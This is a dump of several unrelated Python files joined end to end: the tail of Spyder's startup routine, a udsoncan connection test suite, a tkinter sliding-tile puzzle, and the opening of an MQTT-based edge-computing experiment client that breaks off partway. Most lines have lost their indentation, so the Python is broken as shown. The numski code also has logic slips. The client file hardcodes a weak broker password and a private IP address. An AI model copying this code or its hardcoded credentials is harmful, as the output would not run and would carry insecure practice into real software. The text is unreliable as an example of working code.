if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
        # Byte-compile (optimize) Spyder's whole source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
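# Illustrative sketch only (not Spyder's actual ``set_opengl_implementation``
# helper, which is defined elsewhere): it shows the kind of Qt attribute
# selection that main() triggers before the QApplication is created, mirroring
# the checks done in _test_setting_opengl() above.
def _force_opengl_implementation(option):
    """Select an OpenGL implementation before the application is created."""
    if option == 'software':
        QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL)
    elif option == 'desktop':
        QCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL)
    elif option == 'gles':
        QCoreApplication.setAttribute(Qt.AA_UseOpenGLES)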
test_connection.py
from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
    _STACK_UNAVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
    _STACK_UNAVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
while self.sock1 is None:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(not _STACK_POSSIBLE, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNAVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", is_extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", is_extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
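# Not part of the original module: a conventional unittest entry point
# (a minimal sketch) so this file can also be executed directly as a script.
if __name__ == '__main__':
    unittest.main()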
numski.py
import tkinter as tk
from tkinter.constants import SEL_FIRST
import tkinter.font
from tkinter import messagebox
from random import choice
from time import perf_counter, sleep
from threading import Barrier, Thread
from widgets import generate_font, get_date, button, winner_dialog, shuffling_dialog
tileImg = None
tileImg_a = None
spaceImg = None
barrierImg = None
class numski(tk.Frame):
def __init__(self, size=(5,5), shuffle_times=None, mode='Normal', master=None, gamerule=0):
'''
gamerule: 0 == classical, 1 == barrier
'''
super().__init__(master)
self.master = master
self.configure(bg='white')
self.master.grab_set()
self.size_x, self.size_y = size[0], size[1]
self.length = self.size_x*self.size_y
        if shuffle_times is None:
self.shuffle_times = self.length**2
else:
self.shuffle_times = shuffle_times
self.mode = mode
self.gamerule = gamerule
self.list_finish = [i for i in range(1,self.length)]
self.list_finish.append(0)
self.list_play = [i for i in range(1,self.length)]
self.font = generate_font()
self.create_tiles()
self.arrange_tiles()
self.status = 0
self.last_dest = 0
self.space_pos = self.length - 1
self.time_thread = Thread(target=self.timer)
self.shuffle_thread = Thread(target=self.shuffle_tiles, args=(self.shuffle_times,None))
self.count = 0
self.count_var = tk.StringVar(self)
self.count_var.set("0")
self.time_used = tk.StringVar(self)
self.time_used.set("0")
## self.shuffle_thread.start()
self.count_font = generate_font(size=12)
def barrier_rule_init(self):
global barrierImg
self.gamerule = 1
barrierImg = tk.PhotoImage(file='GUI/GUI_barrier.png')
self.barriers = [0 for i in range(0, self.length)]
self.master.bind('<Button-1>', self.set_barrier)
def set_barrier(self, event):
global barrierImg
tile = event.widget
tile_pos = self.get_tile_pos(tile)
if tile_pos != self.space_pos:
            self.barriers[tile_pos] = 1  # flag this position as a barrier so check_dest() blocks it
tile.configure(text='', image=barrierImg)
tile.unbind('<Enter>')
tile.unbind('<Leave>')
tile.unbind('<FocusIn>')
tile.unbind('<FocusOut>')
print('%d set barrier' % tile_pos)
else:
print('%d cannot set barrier as it is space' % tile_pos)
return None
def bind_keys(self):
self.master.bind('<Key-Up>', lambda event: self.key_move(1))
self.master.bind('<Key-Down>', lambda event: self.key_move(3))
self.master.bind('<Key-Left>', lambda event: self.key_move(0))
self.master.bind('<Key-Right>', lambda event: self.key_move(2))
self.master.bind('<Key-a>', lambda event: self.key_move(0))
self.master.bind('<Key-w>', lambda event: self.key_move(1))
self.master.bind('<Key-d>', lambda event: self.key_move(2))
self.master.bind('<Key-s>', lambda event: self.key_move(3))
def create_tiles(self):
global tileImg, spaceImg, tileImg_a
self.tiles = []
tileImg = tk.PhotoImage(file='GUI/GUI_tile.png')
spaceImg = tk.PhotoImage(file='GUI/GUI_space.png')
tileImg_a = tk.PhotoImage(file='GUI/GUI_tile_a.png')
for i in self.list_play:
tile = button(self,
text='%s'%i,
image=tileImg,
font=self.font,
compound=tk.CENTER,
bd=0,
changebg=False
)
tile.bind('<Enter>', self.tile_bind)
tile.bind('<Leave>', self.tile_bind)
tile.bind('<FocusIn>', self.tile_bind, '+')
tile.bind('<FocusOut>', self.tile_bind, '+')
tile.unbind('<ButtonPress-1>')
tile.unbind('<ButtonRelease-1>')
self.tiles.append(tile)
self.space = tk.Label(self,
image=spaceImg,
bd=0,
fg='black',
bg='white'
)
self.tiles.append(self.space)
self.list_play.append(0)
def arrange_tiles(self):
for i in range(0, self.length):
self.tiles[i].grid(column=i%self.size_x, row=i//self.size_x, padx=0, pady=0)
def generate_pos(self, current_pos):
dests = list(filter(self.check_dest, [current_pos+1, current_pos-1, current_pos+self.size_x, current_pos-self.size_x]))
print('?->%d:' % current_pos, dests)
if len(dests) == 0:
return self.last_dest
else:
dest = choice(dests)
return dest
def move_to(self, dest, check=True, **kw):
if check:
if self.check_dest(dest, **kw):
self.move_to(dest, check=False)
return True
else:
print('%d!->%d' % (self.space_pos, dest))
return False
else:
print('%d->%d' % (self.space_pos, dest))
self.last_dest = self.space_pos
dest_num = self.list_play[dest]
dest_tile = self.tiles[dest]
self.space_pos = dest
self.swap_tiles(self.space, dest_tile)
self.swap_list(0, dest_num, self.list_play)
self.swap_list(self.space, dest_tile, self.tiles)
def check_dest(self, dest, from_space=True, dest_col=None, dest_row=None): ## check the destination of tile or space
space_col, space_row = self.pos_to_col_row(self.space_pos)
if self.gamerule == 0:
            verify_statement_1 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest
            verify_statement_2 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row)
elif self.gamerule == 1:
            verify_statement_1 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest and (not self.barriers[dest])
            verify_statement_2 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row) and (not self.barriers[dest])
if from_space:
dest_col, dest_row = self.pos_to_col_row(dest)
## last_dest = self.last_direct
## print('last:%d' % self.last_dest)
# if dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest:
            if verify_statement_1(dest, dest_col, dest_row, space_col, space_row):
return True
else:
return False
else:
            if dest_col is None and dest_row is None:
dest_col, dest_row = self.pos_to_col_row(dest)
delta = dest - self.space_pos
# if dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row):
            if verify_statement_2(dest, dest_col, dest_row, space_col, space_row):
return True
else:
return False
def key_move(self, key):
print('key move')
if self.count == 0:
self.status = 1
thread = Thread(target=self.timer)
thread.start()
if key == 0: # Key: A Left
dest = self.space_pos - 1
self.key_move_(dest)
elif key == 1: # Key: W Up
dest = self.space_pos - self.size_x
self.key_move_(dest)
elif key == 2: # Key: D Right
dest = self.space_pos + 1
self.key_move_(dest)
elif key == 3: # Key: S Down
dest = self.space_pos + self.size_x
self.key_move_(dest)
def key_move_(self, dest):
if self.check_dest(dest, from_space=False):
self.move_to(dest, check=False)
self.count += 1
self.count_var.set("%d" % self.count)
self.check_win()
def shuffle_tiles(self, times=None, *args):
self.status = 1
self.shuffling = shuffling_dialog(self.master)
self.shuffling.align()
self.shuffling.pro_bar_thread.start()
self.time_thread.start()
while self.count != self.shuffle_times:
dest = self.generate_pos(self.space_pos)
self.move_to(dest, check=False)
self.count += 1
self.count_var.set("%d" % self.count)
self.status = False
self.master.bind('<Button-1>', func=self.click_to_move)
self.bind_keys()
self.shuffling.done()
sleep(0.7)
self.shuffling.back()
self.count = 0
self.count_var.set('0')
def get_tile_pos(self, tile):
return self.co_ords_to_pos([tile.grid_info()['column'], tile.grid_info()['row']])
def click_to_move(self, event):
tile = event.widget
tile_pos = self.get_tile_pos(tile)
if self.move_to(tile_pos, from_space=False):
self.count += 1
self.count_var.set("%d" % self.count)
if self.count == 1:
self.status = 1
thread = Thread(target=self.timer)
thread.start()
self.check_win()
def swap_tiles(self, a, b):
column_b = a.grid_info()['column']
row_b = a.grid_info()['row']
column_a = b.grid_info()['column']
row_a = b.grid_info()['row']
b.grid_configure(column=column_b, row=row_b)
a.grid_configure(column=column_a, row=row_a)
def swap_list(self, a, b, target):
temp = a
index_a = target.index(a)
index_b = target.index(b)
target[index_a] = b
target[index_b] = temp
def pos_to_col_row(self, pos):
return pos % self.size_x, pos // self.size_x # col & row
def co_ords_to_pos(self, coords):
return coords[0] + coords[1] * self.size_x
def vector_to_pos(self, vector):
col, row = self.pos_to_col_row(self.space_pos)
new_coords = (col+vector[0], row+vector[1])
return self.co_ords_to_pos(new_coords)
def tile_bind(self, event):
global tileImg, tileImg_a
action = str(event.type)
tile = event.widget
if action == 'Enter' or action == 'FocusIn':
tile['image'] = tileImg_a
elif action == 'Leave' or action == 'FocusOut':
tile['image'] = tileImg
def timer(self):
time = perf_counter()
while self.status:
self.time_lapsed = perf_counter() - time
self.time_used.set("%.5fs" % self.time_lapsed)
sleep(0.000005)
def disable_tiles(self):
self.master.unbind('<Button-1>')
        key_bindings = ['a', 'w', 'd', 's', 'Left', 'Up', 'Right', 'Down']
        for key in key_bindings:
            self.master.unbind('<Key-%s>' % key)
def write_records(self):
date = get_date()
record = '%s,%s,%.5fs,%d,%d,%s' % (date, self.level, self.time_lapsed, self.count, self.shuffle_times, self.mode)
with open("records.numrcds", 'a') as records:
records.write(record+'\n')
def check_win(self):
if self.list_play == self.list_finish:
self.status = False
self.level = '%dx%d' % (self.size_x, self.size_y)
winner = winner_dialog(self.master, time=self.time_lapsed, move=self.count, level=self.level, shuffle_times=self.shuffle_times, mode=self.mode)
def new_game():
self.master.master.create_select_menu()
self.master.destroy()
winner.new_game.cfg_cmd(new_game)
winner.bind('<Escape>', lambda event: self.master.destroy())
## winner.exit_btn.bind('<Button-1>', lambda event: self.master.destroy())
## winner.new_game.bind('<Button-1>', lambda event: self.master.destroy())
self.disable_tiles()
self.write_records()
def move_space_to_any_dest(self, vector, method=0, *args): ## method = 0 col first
delta_col, delta_row = vector[0], vector[1] ## method = 1 row first
## space_col, space_row = self.pos_to_col_row(self.space_pos)
## delta_col, delta_row = dest_col - space_col, dest_row - space_row
col_move, row_move = 0, 0
dest = self.vector_to_pos(vector)
print('%d=>[%d, %d].%d:%d'%(self.space_pos, delta_col, delta_row, dest, method))
if method:
while row_move != delta_row:
if delta_row < 0:
self.move_to(self.space_pos-self.size_x)
row_move -= 1
else:
self.move_to(self.space_pos+self.size_x, from_space=False)
row_move += 1
## sleep(0.5)
while col_move != delta_col:
if delta_col < 0:
self.move_to(self.space_pos-1, from_space=False)
col_move -= 1
else:
self.move_to(self.space_pos+1, from_space=False)
col_move += 1
## sleep(0.5)
else:
while col_move != delta_col:
if delta_col < 0:
self.move_to(self.space_pos-1, from_space=False)
col_move -= 1
else:
self.move_to(self.space_pos+1, from_space=False)
col_move += 1
## sleep(0.5)
while row_move != delta_row:
if delta_row < 0:
self.move_to(self.space_pos-self.size_x, from_space=False)
row_move -= 1
else:
self.move_to(self.space_pos+self.size_x, from_space=False)
row_move += 1
## sleep(0.5)
## else:
## print('%d!=>[%d, %d].%d:%d'%(self.space_pos, delta_col, delta_row, dest, method))
##
## def chose_method(self, delta_row):
## if delta_row < 0:
## return 0
## else:
## return 1
## def chose_orient(self, delta_col, delta_row):
## if delta_col < 0 and delta_row < 0:
## return ''
## elif delta_col
def move_near_dest(self, orient, delta_pos):
'''
move space to the one of the positions that is close to the dest
four orientations: 'up', 'down', 'right' and 'left'
'''
## method = self.chose_method(delta_pos[1])
## if delta_pos
## if orient == 'up':
## if delta_pos[0] == 0:
## pos = self.space_pos
#### index = choice([0,1])
## new_pos_list = list(filter(self.check_dest, [pos+1, pos-1]))
## new_pos = choice(new_pos_list)
## print('%d:%s'%(new_pos, str(new_pos_list)))
#### new_pos = new_pos_list[index]
## self.move_to(new_pos)
## delta_pos[0] += pos - new_pos
## delta_pos[1] -= 1
## self.move_space_to_any_dest(delta_pos, method=1)
## elif orient == 'down':
## delta_pos[1] += 1
## self.move_space_to_any_dest(delta_pos, method=1)
## elif orient == 'right':
## delta_pos[0] += 1
## self.move_space_to_any_dest(delta_pos, method=0)
## elif orient == 'left':
## delta_pos[0] -= 1
## self.move_space_to_any_dest(delta_pos, method=0)
signs = [-1,1]
directs = [self.size_x, 1]
up = orient == 'up'
down = orient == 'down'
right = orient == 'right'
sign = down or right
condi = (up or down)
## if up or down:
print(orient)
if delta_pos[not condi] == 0:
pos = self.space_pos
## index = choice([0,1])
new_pos_list = list(filter(self.check_dest, [pos+directs[condi], pos-directs[condi]]))
new_pos = choice(new_pos_list)
print('%d:%s'%(new_pos, str(new_pos_list)))
## new_pos = new_pos_list[index]
self.move_to(new_pos, check=False)
delta_pos[not condi] += (pos - new_pos) / directs[condi]
delta_pos[condi] += signs[sign]
dest = self.vector_to_pos(delta_pos)
self.move_space_to_any_dest(delta_pos, method=condi)
## else:
## if delta_pos[1] == 0:
def move_tile_vertically(self, up=True):
if up:
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-1)
else:
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos-1)
def move_tile_horizontally(self, right=True):
if right:
self.move_to(self.space_pos-1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+self.size_x)
else:
self.move_to(self.space_pos+1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-1)
self.move_to(self.space_pos-1)
self.move_to(self.space_pos+self.size_x)
def move_tile_to_any_pos(self, tile_num, dest, *args):
dest_col, dest_row = self.pos_to_col_row(dest)
tile = self.tiles[tile_num]
tile_col, tile_row = tile.grid_info()['column'], tile.grid_info()['row']
delta_col, delta_row = dest_col - tile_col, dest_row - tile_row
col_move, row_move = 0, 0
def create_numski(master, size, shuffle_times):
app = numski(size=size, shuffle_times=shuffle_times, master=master)
app.pack()
def test(event):
print('Press', event.keycode)
def create_thread(target, args):
t = Thread(target=target, args=args)
t.start()
if __name__ == '__main__':
root = tk.Tk()
app = numski(master=root, size=(8,7), mode='Test', shuffle_times=20)
app.pack()
## thread = Thread(target=app.move_space_to_any_dest, args=(5,1))
## thread.start()
## app.move_space_to_any_dest(5)
## app.move_tile_to_any_pos(1, 1)
app.move_space_to_any_dest([-4, 0], method=1)
## sleep(2)
app.move_near_dest('down', [0,-5])
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_near_dest('right', [0,-1])
app.move_tile_horizontally()
app.barrier_rule_init()
app.barriers[54] = 1
app.barriers[55] = 1
app.barriers[20] = 1
# app.master.bind('<Button-1>', func=app.click_to_move)
# app.shuffle_thread.start()
root.mainloop()
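# Illustrative only (not used by the test run above): a minimal launcher built
# on create_numski(), assuming the image assets under GUI/ are available.
def demo_launch(size=(4, 4), shuffle_times=50):
    window = tk.Tk()
    create_numski(window, size, shuffle_times)
    window.mainloop()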
client.py
#!/usr/bin/env python3
import matplotlib
import socket
import os
import ast
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import pickle
import data_homo as homo
import data_hetero as hetero
import argparse
from threading import Thread
import threading
matplotlib.use('TkAgg')
shared_resource_lock = threading.Lock()
record = [] # [({tasks}, {waiting time}), hostname] records the task list and execution and waiting time and host sent
run = 1
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# idea for task naming # client-id_task-no_task-id client id = 11, task no=> sequence no, task id => t1
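# Illustrative shape only (hypothetical values, not from a real run): what one
# task_record entry looks like once a result has been received back, matching
# the {seq_no: {task: [duration, start_time, finish_time]}} layout noted above.
_task_record_example = {
    10: {'t2.110.170.10': [dt.timedelta(seconds=1),               # allowed duration
                           dt.datetime(2020, 4, 9, 14, 38, 39),   # start time
                           dt.datetime(2020, 4, 9, 14, 38, 40)]}  # finish time
}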
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
    dis = 'Seq: {}\nTotal Tasks: {}\nTotal split tasks: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
if len(k) < 3: # check if i have received a task with the same id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
def receive_mec_start(stop):
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
broker_ip = '192.168.122.111'
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
